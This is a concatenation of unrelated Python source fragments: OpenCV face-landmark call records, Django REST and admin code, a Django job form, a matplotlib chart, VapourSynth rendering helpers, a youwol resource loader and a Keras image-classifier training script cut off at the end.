'cv2.line', 'cv.line', (['image', 'landmark_point[154]', 'landmark_point[155]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[154], landmark_point[155], (0, 255, 0), 2)\n', (6630, 6695), True, 'import cv2 as cv\n'), ((6720, 6792), 'cv2.line', 'cv.line', (['image', 'landmark_point[155]', 'landmark_point[133]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[155], landmark_point[133], (0, 255, 0), 2)\n', (6727, 6792), True, 'import cv2 as cv\n'), ((6847, 6919), 'cv2.line', 'cv.line', (['image', 'landmark_point[362]', 'landmark_point[398]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[362], landmark_point[398], (0, 255, 0), 2)\n', (6854, 6919), True, 'import cv2 as cv\n'), ((6944, 7016), 'cv2.line', 'cv.line', (['image', 'landmark_point[398]', 'landmark_point[384]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[398], landmark_point[384], (0, 255, 0), 2)\n', (6951, 7016), True, 'import cv2 as cv\n'), ((7041, 7113), 'cv2.line', 'cv.line', (['image', 'landmark_point[384]', 'landmark_point[385]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[384], landmark_point[385], (0, 255, 0), 2)\n', (7048, 7113), True, 'import cv2 as cv\n'), ((7138, 7210), 'cv2.line', 'cv.line', (['image', 'landmark_point[385]', 'landmark_point[386]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[385], landmark_point[386], (0, 255, 0), 2)\n', (7145, 7210), True, 'import cv2 as cv\n'), ((7235, 7307), 'cv2.line', 'cv.line', (['image', 'landmark_point[386]', 'landmark_point[387]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[386], landmark_point[387], (0, 255, 0), 2)\n', (7242, 7307), True, 'import cv2 as cv\n'), ((7332, 7404), 'cv2.line', 'cv.line', (['image', 'landmark_point[387]', 'landmark_point[388]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[387], landmark_point[388], (0, 255, 0), 2)\n', (7339, 7404), True, 'import cv2 as cv\n'), ((7429, 7501), 'cv2.line', 'cv.line', (['image', 'landmark_point[388]', 'landmark_point[466]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[388], landmark_point[466], (0, 255, 0), 2)\n', (7436, 7501), True, 'import cv2 as cv\n'), ((7527, 7599), 'cv2.line', 'cv.line', (['image', 'landmark_point[466]', 'landmark_point[390]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[466], landmark_point[390], (0, 255, 0), 2)\n', (7534, 7599), True, 'import cv2 as cv\n'), ((7624, 7696), 'cv2.line', 'cv.line', (['image', 'landmark_point[390]', 'landmark_point[373]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[390], landmark_point[373], (0, 255, 0), 2)\n', (7631, 7696), True, 'import cv2 as cv\n'), ((7721, 7793), 'cv2.line', 'cv.line', (['image', 'landmark_point[373]', 'landmark_point[374]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[373], landmark_point[374], (0, 255, 0), 2)\n', (7728, 7793), True, 'import cv2 as cv\n'), ((7818, 7890), 'cv2.line', 'cv.line', (['image', 'landmark_point[374]', 'landmark_point[380]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[374], landmark_point[380], (0, 255, 0), 2)\n', (7825, 7890), True, 'import cv2 as cv\n'), ((7915, 7987), 'cv2.line', 'cv.line', (['image', 'landmark_point[380]', 'landmark_point[381]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[380], landmark_point[381], (0, 255, 0), 2)\n', (7922, 7987), True, 'import cv2 as cv\n'), ((8012, 8084), 'cv2.line', 'cv.line', (['image', 'landmark_point[381]', 'landmark_point[382]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[381], landmark_point[382], (0, 255, 0), 2)\n', (8019, 8084), True, 'import cv2 as cv\n'), ((8109, 8181), 'cv2.line', 'cv.line', (['image', 'landmark_point[382]', 'landmark_point[362]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[382], landmark_point[362], (0, 255, 0), 2)\n', (8116, 8181), True, 'import cv2 as cv\n'), ((8234, 8306), 'cv2.line', 'cv.line', (['image', 'landmark_point[308]', 'landmark_point[415]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[308], landmark_point[415], (0, 255, 0), 2)\n', (8241, 8306), True, 'import cv2 as cv\n'), ((8331, 8403), 'cv2.line', 'cv.line', (['image', 'landmark_point[415]', 'landmark_point[310]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[415], landmark_point[310], (0, 255, 0), 2)\n', (8338, 8403), True, 'import cv2 as cv\n'), ((8428, 8500), 'cv2.line', 'cv.line', (['image', 'landmark_point[310]', 'landmark_point[311]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[310], landmark_point[311], (0, 255, 0), 2)\n', (8435, 8500), True, 'import cv2 as cv\n'), ((8525, 8597), 'cv2.line', 'cv.line', (['image', 'landmark_point[311]', 'landmark_point[312]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[311], landmark_point[312], (0, 255, 0), 2)\n', (8532, 8597), True, 'import cv2 as cv\n'), ((8622, 8693), 'cv2.line', 'cv.line', (['image', 'landmark_point[312]', 'landmark_point[13]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[312], landmark_point[13], (0, 255, 0), 2)\n', (8629, 8693), True, 'import cv2 as cv\n'), ((8702, 8772), 'cv2.line', 'cv.line', (['image', 'landmark_point[13]', 'landmark_point[82]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[13], landmark_point[82], (0, 255, 0), 2)\n', (8709, 8772), True, 'import cv2 as cv\n'), ((8781, 8851), 'cv2.line', 'cv.line', (['image', 'landmark_point[82]', 'landmark_point[81]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[82], landmark_point[81], (0, 255, 0), 2)\n', (8788, 8851), True, 'import cv2 as cv\n'), ((8860, 8930), 'cv2.line', 'cv.line', (['image', 'landmark_point[81]', 'landmark_point[80]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[81], landmark_point[80], (0, 255, 0), 2)\n', (8867, 8930), True, 'import cv2 as cv\n'), ((8939, 9010), 'cv2.line', 'cv.line', (['image', 'landmark_point[80]', 'landmark_point[191]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[80], landmark_point[191], (0, 255, 0), 2)\n', (8946, 9010), True, 'import cv2 as cv\n'), ((9019, 9090), 'cv2.line', 'cv.line', (['image', 'landmark_point[191]', 'landmark_point[78]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[191], landmark_point[78], (0, 255, 0), 2)\n', (9026, 9090), True, 'import cv2 as cv\n'), ((9100, 9170), 'cv2.line', 'cv.line', (['image', 'landmark_point[78]', 'landmark_point[95]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[78], landmark_point[95], (0, 255, 0), 2)\n', (9107, 9170), True, 'import cv2 as cv\n'), ((9179, 9249), 'cv2.line', 'cv.line', (['image', 'landmark_point[95]', 'landmark_point[88]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[95], landmark_point[88], (0, 255, 0), 2)\n', (9186, 9249), True, 'import cv2 as cv\n'), ((9258, 9329), 'cv2.line', 'cv.line', (['image', 'landmark_point[88]', 'landmark_point[178]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[88], landmark_point[178], (0, 255, 0), 2)\n', (9265, 9329), True, 'import cv2 as cv\n'), ((9338, 9409), 'cv2.line', 'cv.line', (['image', 'landmark_point[178]', 'landmark_point[87]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[178], landmark_point[87], (0, 255, 0), 2)\n', (9345, 9409), True, 'import cv2 as cv\n'), ((9418, 9488), 'cv2.line', 'cv.line', (['image', 'landmark_point[87]', 'landmark_point[14]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[87], landmark_point[14], (0, 255, 0), 2)\n', (9425, 9488), True, 'import cv2 as cv\n'), ((9497, 9568), 'cv2.line', 'cv.line', (['image', 'landmark_point[14]', 'landmark_point[317]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[14], landmark_point[317], (0, 255, 0), 2)\n', (9504, 9568), True, 'import cv2 as cv\n'), ((9577, 9649), 'cv2.line', 'cv.line', (['image', 'landmark_point[317]', 'landmark_point[402]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[317], landmark_point[402], (0, 255, 0), 2)\n', (9584, 9649), True, 'import cv2 as cv\n'), ((9674, 9746), 'cv2.line', 'cv.line', (['image', 'landmark_point[402]', 'landmark_point[318]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[402], landmark_point[318], (0, 255, 0), 2)\n', (9681, 9746), True, 'import cv2 as cv\n'), ((9771, 9843), 'cv2.line', 'cv.line', (['image', 'landmark_point[318]', 'landmark_point[324]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[318], landmark_point[324], (0, 255, 0), 2)\n', (9778, 9843), True, 'import cv2 as cv\n'), ((9868, 9940), 'cv2.line', 'cv.line', (['image', 'landmark_point[324]', 'landmark_point[308]', '(0, 255, 0)', '(2)'], {}), '(image, landmark_point[324], landmark_point[308], (0, 255, 0), 2)\n', (9875, 9940), True, 'import cv2 as cv\n'), ((10067, 10146), 'cv2.rectangle', 'cv.rectangle', (['image', '(brect[0], brect[1])', '(brect[2], brect[3])', '(0, 255, 0)', '(2)'], {}), '(image, (brect[0], brect[1]), (brect[2], brect[3]), (0, 255, 0), 2)\n', (10079, 10146), True, 'import cv2 as cv\n'), ((3795, 3829), 'numpy.array', 'np.array', (['(landmark_x, landmark_y)'], {}), '((landmark_x, landmark_y))\n', (3803, 3829), True, 'import numpy as np\n')] |
"""Vista del inventario del modulo de prestamos tecnologicos."""
# Django REST Framework
from rest_framework import viewsets, mixins
# Permisos
from rest_framework.permissions import IsAuthenticated
from andromeda.modules.inventory.permissions import IsAdmin, IsStaff
# Modelos
from andromeda.modules.loans.models import InventoryLoans
# Serializers
from andromeda.modules.loans.serializers import InventoryLoansSerializer, CreateInventoryLoansSerializer
class InventoryLoansViewSet(mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.ListModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
"""View set del inventario para el modulo de prestamos tecnologicos."""
queryset = InventoryLoans.objects.all()
def get_permissions(self):
"""Asigna los permisos basados en la acción."""
permissions = [IsAuthenticated]
if self.action in ['destroy']:
permissions.append(IsAdmin)
elif self.action in ['update', 'partial_update']:
permissions.append(IsStaff)
return (p() for p in permissions)
def get_serializer_class(self):
"""Asigna el serializer basado en la acción."""
if self.action == 'create':
return CreateInventoryLoansSerializer
return InventoryLoansSerializer
| [
"andromeda.modules.loans.models.InventoryLoans.objects.all"
] | [((818, 846), 'andromeda.modules.loans.models.InventoryLoans.objects.all', 'InventoryLoans.objects.all', ([], {}), '()\n', (844, 846), False, 'from andromeda.modules.loans.models import InventoryLoans\n')] |
import matplotlib.pyplot as plt
x = ["N=1", "N=2", "N=3", "N=4", "N=5","N=6"]
y = [0.9365, 0.9865, 0.9895, 0.9950,0.9880,0.9615]
rects = plt.barh(x, y, color=["red", "blue", "purple", "violet", "green", "black"])
for rect in rects: # rects 是三根柱子的集合
width = rect.get_width()
print(width)
plt.text(width, rect.get_y() + rect.get_height() / 2, str(width), size=10)
plt.xlim(0.0,1.3)
# plt.legend()
plt.show()
x = ["k=1e-5","k=1e-4", "k=1e-3", "k=1e-2", "k=1e-1", "k=1.0"]
y = [0.9895, 0.9900, 0.9950, 0.9885,0.9740,0.831]
# y = [0.9365, 0.9865, 0.9895, 0.9950,0.9880,0.9615]
rects = plt.barh(x, y, color=["red", "blue", "purple", "violet", "green", "black"])
for rect in rects: # rects 是三根柱子的集合
width = rect.get_width()
print(width)
plt.text(width, rect.get_y() + rect.get_height() / 2, str(width), size=10)
plt.xlim(0.0,1.3)
# plt.legend()
plt.show() | [
"matplotlib.pyplot.barh",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.show"
] | [((138, 213), 'matplotlib.pyplot.barh', 'plt.barh', (['x', 'y'], {'color': "['red', 'blue', 'purple', 'violet', 'green', 'black']"}), "(x, y, color=['red', 'blue', 'purple', 'violet', 'green', 'black'])\n", (146, 213), True, 'import matplotlib.pyplot as plt\n'), ((376, 394), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.0)', '(1.3)'], {}), '(0.0, 1.3)\n', (384, 394), True, 'import matplotlib.pyplot as plt\n'), ((409, 419), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (417, 419), True, 'import matplotlib.pyplot as plt\n'), ((595, 670), 'matplotlib.pyplot.barh', 'plt.barh', (['x', 'y'], {'color': "['red', 'blue', 'purple', 'violet', 'green', 'black']"}), "(x, y, color=['red', 'blue', 'purple', 'violet', 'green', 'black'])\n", (603, 670), True, 'import matplotlib.pyplot as plt\n'), ((833, 851), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.0)', '(1.3)'], {}), '(0.0, 1.3)\n', (841, 851), True, 'import matplotlib.pyplot as plt\n'), ((866, 876), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (874, 876), True, 'import matplotlib.pyplot as plt\n')] |
"""
Clip rendering helpers.
"""
import vapoursynth as vs
from enum import Enum
from threading import Condition
from typing import BinaryIO, Callable, Dict, List, Optional, TextIO, Union
from concurrent.futures import Future
from functools import partial
from .progress import Progress, BarColumn, FPSColumn, TextColumn, TimeRemainingColumn
from .util import get_prop
core = vs.core
RenderCallback = Callable[[int, vs.VideoFrame], None]
class RenderContext:
"""
Contains info on the current render operation.
"""
clip: vs.VideoNode
queued: int
frames: Dict[int, vs.VideoFrame]
frames_rendered: int
timecodes: List[float]
condition: Condition
def __init__(self, clip: vs.VideoNode, queued: int) -> None:
self.clip = clip
self.queued = queued
self.frames = {}
self.frames_rendered = 0
self.timecodes = [0.0]
self.condition = Condition()
def finish_frame(outfile: Optional[BinaryIO], timecodes: Optional[TextIO], ctx: RenderContext) -> None:
"""
Output a frame.
:param outfile: Output IO handle for Y4MPEG
:param timecodes: Output IO handle for timecodesv2
:param ctx: Rendering context
"""
if timecodes:
timecodes.write(f"{round(ctx.timecodes[ctx.frames_rendered]*1000):d}\n")
if outfile is None:
return
f: vs.VideoFrame = ctx.frames[ctx.frames_rendered]
outfile.write("FRAME\n".encode("utf-8"))
for i, p in enumerate(f.planes()):
if f.get_stride(i) != p.width * f.format.bytes_per_sample:
outfile.write(bytes(p)) # type: ignore
else:
outfile.write(p) # type: ignore
def clip_async_render(clip: vs.VideoNode,
outfile: Optional[BinaryIO] = None,
timecodes: Optional[TextIO] = None,
progress: Optional[str] = "Rendering clip...",
callback: Union[RenderCallback, List[RenderCallback], None] = None) -> List[float]:
"""
Render a clip by requesting frames asynchronously using clip.get_frame_async,
providing for callback with frame number and frame object.
This is mostly a re-implementation of VideoNode.output, but a little bit slower since it's pure python.
You only really need this when you want to render a clip while operating on each frame in order
or you want timecodes without using vspipe.
:param clip: Clip to render.
:param outfile: Y4MPEG render output BinaryIO handle. If None, no Y4M output is performed.
Use ``sys.stdout.buffer`` for stdout. (Default: None)
:param timecodes: Timecode v2 file TextIO handle. If None, timecodes will not be written.
:param progress: String to use for render progress display.
If empty or ``None``, no progress display.
:param callback: Single or list of callbacks to be preformed. The callbacks are called
when each sequential frame is output, not when each frame is done.
Must have signature ``Callable[[int, vs.VideoNode], None]``
See :py:func:`lvsfunc.comparison.diff` for a use case (Default: None).
:return: List of timecodes from rendered clip.
"""
cbl = [] if callback is None else callback if isinstance(callback, list) else [callback]
if progress:
p = get_render_progress()
task = p.add_task(progress, total=clip.num_frames)
def _progress_cb(n: int, f: vs.VideoFrame) -> None:
p.update(task, advance=1)
cbl.append(_progress_cb)
ctx = RenderContext(clip, core.num_threads)
bad_timecodes: bool = False
def cb(f: Future[vs.VideoFrame], n: int) -> None:
ctx.frames[n] = f.result()
nn = ctx.queued
while ctx.frames_rendered in ctx.frames:
nonlocal timecodes
nonlocal bad_timecodes
frame = ctx.frames[ctx.frames_rendered]
# if a frame is missing timing info, clear timecodes because they're worthless
if ("_DurationNum" not in frame.props or "_DurationDen" not in frame.props) and not bad_timecodes:
bad_timecodes = True
if timecodes:
timecodes.seek(0)
timecodes.truncate()
timecodes = None
ctx.timecodes = []
print("clip_async_render: frame missing duration information, discarding timecodes")
elif not bad_timecodes:
ctx.timecodes.append(ctx.timecodes[-1]
+ get_prop(frame, "_DurationNum", int)
/ get_prop(frame, "_DurationDen", int))
finish_frame(outfile, timecodes, ctx)
[cb(ctx.frames_rendered, ctx.frames[ctx.frames_rendered]) for cb in cbl]
del ctx.frames[ctx.frames_rendered] # tfw no infinite memory
ctx.frames_rendered += 1
# enqueue a new frame
if nn < clip.num_frames:
ctx.queued += 1
cbp = partial(cb, n=nn)
clip.get_frame_async(nn).add_done_callback(cbp) # type: ignore
ctx.condition.acquire()
ctx.condition.notify()
ctx.condition.release()
if outfile:
if clip.format is None:
raise ValueError("clip_async_render: 'Cannot render a variable format clip to y4m!'")
if clip.format.color_family not in (vs.YUV, vs.GRAY):
raise ValueError("clip_async_render: 'Can only render YUV and GRAY clips to y4m!'")
if clip.format.color_family == vs.GRAY:
y4mformat = "mono"
else:
ss = (clip.format.subsampling_w, clip.format.subsampling_h)
if ss == (1, 1):
y4mformat = "420"
elif ss == (1, 0):
y4mformat = "422"
elif ss == (0, 0):
y4mformat = "444"
elif ss == (2, 2):
y4mformat = "410"
elif ss == (2, 0):
y4mformat = "411"
elif ss == (0, 1):
y4mformat = "440"
else:
raise ValueError("clip_async_render: 'What have you done'")
y4mformat = f"{y4mformat}p{clip.format.bits_per_sample}" if clip.format.bits_per_sample > 8 else y4mformat
header = f"YUV4MPEG2 C{y4mformat} W{clip.width} H{clip.height} F{clip.fps_num}:{clip.fps_den} Ip A0:0\n"
outfile.write(header.encode("utf-8"))
if timecodes:
timecodes.write("# timestamp format v2\n")
ctx.condition.acquire()
# seed threads
if progress:
p.start()
try:
for n in range(min(clip.num_frames, core.num_threads)):
cbp = partial(cb, n=n) # lambda won't bind the int immediately
clip.get_frame_async(n).add_done_callback(cbp) # type: ignore
while ctx.frames_rendered != clip.num_frames:
ctx.condition.wait()
finally:
if progress:
p.stop()
return ctx.timecodes # might as well
def get_render_progress() -> Progress:
return Progress(
TextColumn("{task.description}"),
BarColumn(),
TextColumn("{task.completed}/{task.total}"),
TextColumn("{task.percentage:>3.02f}%"),
FPSColumn(),
TimeRemainingColumn(),
)
class SceneChangeMode(Enum):
WWXD = 0
SCXVID = 1
WWXD_SCXVID_UNION = 2
WWXD_SCXVID_INTERSECTION = 3
def find_scene_changes(clip: vs.VideoNode, mode: SceneChangeMode = SceneChangeMode.WWXD) -> List[int]:
"""
Generate a list of scene changes (keyframes).
Dependencies:
* vapoursynth-wwxd
* vapoursynth-scxvid (Optional: scxvid mode)
:param clip: Clip to search for scene changes. Will be rendered in its entirety.
:param mode: Scene change detection mode:
* WWXD: Use wwxd
* SCXVID: Use scxvid
* WWXD_SCXVID_UNION: Union of wwxd and sxcvid (must be detected by at least one)
* WWXD_SCXVID_INTERSECTION: Intersection of wwxd and scxvid (must be detected by both)
:return: List of scene changes.
"""
frames = []
clip = clip.resize.Bilinear(640, 360, format=vs.YUV420P8)
if mode in (SceneChangeMode.WWXD, SceneChangeMode.WWXD_SCXVID_UNION, SceneChangeMode.WWXD_SCXVID_INTERSECTION):
clip = clip.wwxd.WWXD()
if mode in (SceneChangeMode.SCXVID, SceneChangeMode.WWXD_SCXVID_UNION, SceneChangeMode.WWXD_SCXVID_INTERSECTION):
clip = clip.scxvid.Scxvid()
def _cb(n: int, f: vs.VideoFrame) -> None:
if mode == SceneChangeMode.WWXD:
if get_prop(f, "Scenechange", int) == 1:
frames.append(n)
elif mode == SceneChangeMode.SCXVID:
if get_prop(f, "_SceneChangePrev", int) == 1:
frames.append(n)
elif mode == SceneChangeMode.WWXD_SCXVID_UNION:
if get_prop(f, "Scenechange", int) == 1 or get_prop(f, "_SceneChangePrev", int) == 1:
frames.append(n)
elif mode == SceneChangeMode.WWXD_SCXVID_INTERSECTION:
if get_prop(f, "Scenechange", int) == 1 and get_prop(f, "_SceneChangePrev", int) == 1:
frames.append(n)
clip_async_render(clip, progress="Detecting scene changes...", callback=_cb)
return sorted(frames)
| [
"threading.Condition",
"functools.partial"
] | [((917, 928), 'threading.Condition', 'Condition', ([], {}), '()\n', (926, 928), False, 'from threading import Condition\n'), ((5104, 5121), 'functools.partial', 'partial', (['cb'], {'n': 'nn'}), '(cb, n=nn)\n', (5111, 5121), False, 'from functools import partial\n'), ((6767, 6783), 'functools.partial', 'partial', (['cb'], {'n': 'n'}), '(cb, n=n)\n', (6774, 6783), False, 'from functools import partial\n')] |
from django import forms
from django.utils.translation import ugettext_lazy as _
from geekjobs.models import Job
"""
class JobForm(forms.Form):
title = forms.CharField(label='Job title', max_length=380)
city = forms.CharField(label='City', max_length=100, required=False)
state = forms.ChoiceField(label='State', choices=DE_STATE_CHOICES)
remote = forms.BooleanField(label='Remote', required=False)
salary = forms.CharField(label='Salary', max_length=100, required=False)
description = forms.CharField(label='Job Description', max_length=10000)
description.widget = forms.HiddenInput()
instructions = forms.CharField(label='How do people apply for this job?', max_length=380)
instructions.widget = forms.Textarea(attrs={'rows': 3})
name = forms.CharField(label='Company Name', max_length=100)
url = forms.CharField(label='Job URL', max_length=150)
email = forms.EmailField(label='Email')
"""
class JobForm(forms.ModelForm):
class Meta:
model = Job
fields = ('title', 'city', 'state', 'remote', 'salary', 'description', 'instructions', 'name', 'url', 'email')
widgets = {
'description': forms.HiddenInput,
'instructions': forms.Textarea(attrs={'rows': 3})
}
labels = {
'title': _('Job Title'),
'city': _('City'),
'state': _('State'),
'remote': _('Remote'),
'salary': _('Salary'),
'description': _('Job Description'),
'instructions': _('How do people apply for this job?'),
'name': _('Company Name'),
'url': _('Job URL'),
'email': _('Email')
}
| [
"django.utils.translation.ugettext_lazy",
"django.forms.Textarea"
] | [((1224, 1257), 'django.forms.Textarea', 'forms.Textarea', ([], {'attrs': "{'rows': 3}"}), "(attrs={'rows': 3})\n", (1238, 1257), False, 'from django import forms\n'), ((1308, 1322), 'django.utils.translation.ugettext_lazy', '_', (['"""Job Title"""'], {}), "('Job Title')\n", (1309, 1322), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1344, 1353), 'django.utils.translation.ugettext_lazy', '_', (['"""City"""'], {}), "('City')\n", (1345, 1353), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1376, 1386), 'django.utils.translation.ugettext_lazy', '_', (['"""State"""'], {}), "('State')\n", (1377, 1386), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1410, 1421), 'django.utils.translation.ugettext_lazy', '_', (['"""Remote"""'], {}), "('Remote')\n", (1411, 1421), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1445, 1456), 'django.utils.translation.ugettext_lazy', '_', (['"""Salary"""'], {}), "('Salary')\n", (1446, 1456), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1485, 1505), 'django.utils.translation.ugettext_lazy', '_', (['"""Job Description"""'], {}), "('Job Description')\n", (1486, 1505), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1535, 1573), 'django.utils.translation.ugettext_lazy', '_', (['"""How do people apply for this job?"""'], {}), "('How do people apply for this job?')\n", (1536, 1573), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1595, 1612), 'django.utils.translation.ugettext_lazy', '_', (['"""Company Name"""'], {}), "('Company Name')\n", (1596, 1612), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1633, 1645), 'django.utils.translation.ugettext_lazy', '_', (['"""Job URL"""'], {}), "('Job URL')\n", (1634, 1645), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1668, 1678), 'django.utils.translation.ugettext_lazy', '_', (['"""Email"""'], {}), "('Email')\n", (1669, 1678), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import asyncio
import os
from youwol_utils import WhereClause, QueryBody, Query, Path, flatten
from .configurations import Configuration
from .utils import format_download_form, post_storage_by_chunk, md5_from_folder
from .utils_indexing import format_doc_db_record, post_indexes, get_version_number_str
async def init_resources(config: Configuration):
print("### Ensure database resources ###")
headers = await config.admin_headers if config.admin_headers else {}
doc_db = config.doc_db
storage = config.storage
table_ok, bucket_ok = await asyncio.gather(
doc_db.ensure_table(headers=headers),
storage.ensure_bucket(headers=headers)
)
if bucket_ok and not table_ok:
print("Need to re-index stuffs of bucket")
raise Exception("The table index is not up-to-date w/ bucket content, manual index-synchronisation needed")
clauses = [[WhereClause(column="library_name", relation="eq", term=lib.split("#")[0]),
WhereClause(column="version_number", relation="eq", term=get_version_number_str(lib.split("#")[1]))
]
for lib in Configuration.required_libs]
bodies = [QueryBody(query=Query(where_clause=c)) for c in clauses]
responses = await asyncio.gather(*[doc_db.query(query_body=b, owner=Configuration.owner, headers=headers)
for b in bodies])
if all([len(r['documents']) == 1 for r in responses]):
print("Found required resources")
return
print("post initial resources")
await synchronize(Path(__file__).parent / "initial_resources", "", config, headers=headers)
print("### resources initialization done ###")
async def synchronize(dir_path: Path, zip_dir_name: str, configuration: any, headers: any):
paths = flatten([[Path(root) / f for f in files] for root, _, files in os.walk(str(dir_path))])
paths = list(paths)
forms = await asyncio.gather(*[format_download_form(path, Path(), dir_path / zip_dir_name, False)
for path in paths])
await post_storage_by_chunk(configuration.storage, list(forms), 1, headers)
paths_index = flatten([[Path(root) / f for f in files if f == "package.json"]
for root, _, files in os.walk(str(dir_path))])
check_dum = md5_from_folder(dir_path)
indexes = [format_doc_db_record(package_path=path, fingerprint=check_dum) for path in paths_index]
namespaces = {d["namespace"] for d in indexes}
await post_indexes(configuration.doc_db, indexes, 25, headers)
return len(forms), len(indexes), namespaces
| [
"youwol_utils.Path",
"youwol_utils.Query"
] | [((1197, 1218), 'youwol_utils.Query', 'Query', ([], {'where_clause': 'c'}), '(where_clause=c)\n', (1202, 1218), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1582, 1596), 'youwol_utils.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1586, 1596), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1825, 1835), 'youwol_utils.Path', 'Path', (['root'], {}), '(root)\n', (1829, 1835), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((2194, 2204), 'youwol_utils.Path', 'Path', (['root'], {}), '(root)\n', (2198, 2204), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1989, 1995), 'youwol_utils.Path', 'Path', ([], {}), '()\n', (1993, 1995), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n')] |
from django.contrib import admin
from .models import KwikPost, Comment, Like
# Register your models here.
@admin.register(KwikPost)
class KwikPostAdmin(admin.ModelAdmin):
list_display = ['user', 'featured_image', 'slug', 'post_body', 'created_at']
list_filter = ['created_at']
prepopulated_fields = {'slug': ('post_body',)[:20]}
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = ['user', 'post', 'user_comment', 'created_at']
@admin.register(Like)
class LikeAdmin(admin.ModelAdmin):
list_display = ['user', 'post', 'values', 'created_at']
| [
"django.contrib.admin.register"
] | [((110, 134), 'django.contrib.admin.register', 'admin.register', (['KwikPost'], {}), '(KwikPost)\n', (124, 134), False, 'from django.contrib import admin\n'), ((347, 370), 'django.contrib.admin.register', 'admin.register', (['Comment'], {}), '(Comment)\n', (361, 370), False, 'from django.contrib import admin\n'), ((478, 498), 'django.contrib.admin.register', 'admin.register', (['Like'], {}), '(Like)\n', (492, 498), False, 'from django.contrib import admin\n')] |
import keras
from keras import layers
from keras.layers import Dropout, Dense
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import tensorflow_hub as hub
import cv2
import pandas as p
IMAGE_SHAPE = (224, 224) #(HEIGHT, WIDTH)
TRAINING_DATA_DIRECTORY = '/content/drive/My Drive/Colab Notebooks/FlowerClassification/data/TrainingData'
datagen_kwargs = dict(rescale=1./255, validation_split=.2)
def get_validation_generator():
validation_datagen = ImageDataGenerator(**datagen_kwargs)
validation_generator = validation_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='validation',
shuffle=True,
target_size=IMAGE_SHAPE
)
return validation_generator
def get_training_generator():
training_datagen = ImageDataGenerator(**datagen_kwargs)
training_generator = training_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='training',
shuffle=True,
target_size=IMAGE_SHAPE
)
return training_generator
def get_mobile_net_model():
model = keras.Sequential()
model.add(hub.KerasLayer(
'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',
output_shape=[1280],
trainable=False)
)
model.add(Dropout(0.4))
model.add(Dense(training_generator.num_classes, activation='softmax'))
model.build([None, 224, 224, 3])
model.summary()
return model
def train_model(model, training_generator=None, validation_generator=None):
if (training_generator == None):
training_generator = get_training_generator()
if (validation_generator == None):
validation_generator = get_validation_generator()
optimizer = keras.optimizers.Adam(lr=1e-3)
model.compile(
optimizer=optimizer,
loss='categorical_crossentropy',
metrics=['acc']
)
steps_per_epoch = np.ceil(
training_generator.samples / training_generator.batch_size
)
validation_steps_per_epoch = np.ceil(
validation_generator.samples / validation_generator.batch_size
)
hist = model.fit(
training_generator,
epochs=20,
verbose=1,
steps_per_epoch=steps_per_epoch,
validation_data=validation_generator,
validation_steps=validation_steps_per_epoch
).history
print('model trained')
model.save('/content/drive/My Drive/Colab Notebooks/FlowerClassification/model_100_epochs.h5')
print('model saved')
#converting history.history dictionary to pandas dataframe
hist_df = pd.DataFrame(history.history)
# save to json
hist_json_file = 'history_100_epochs.json'
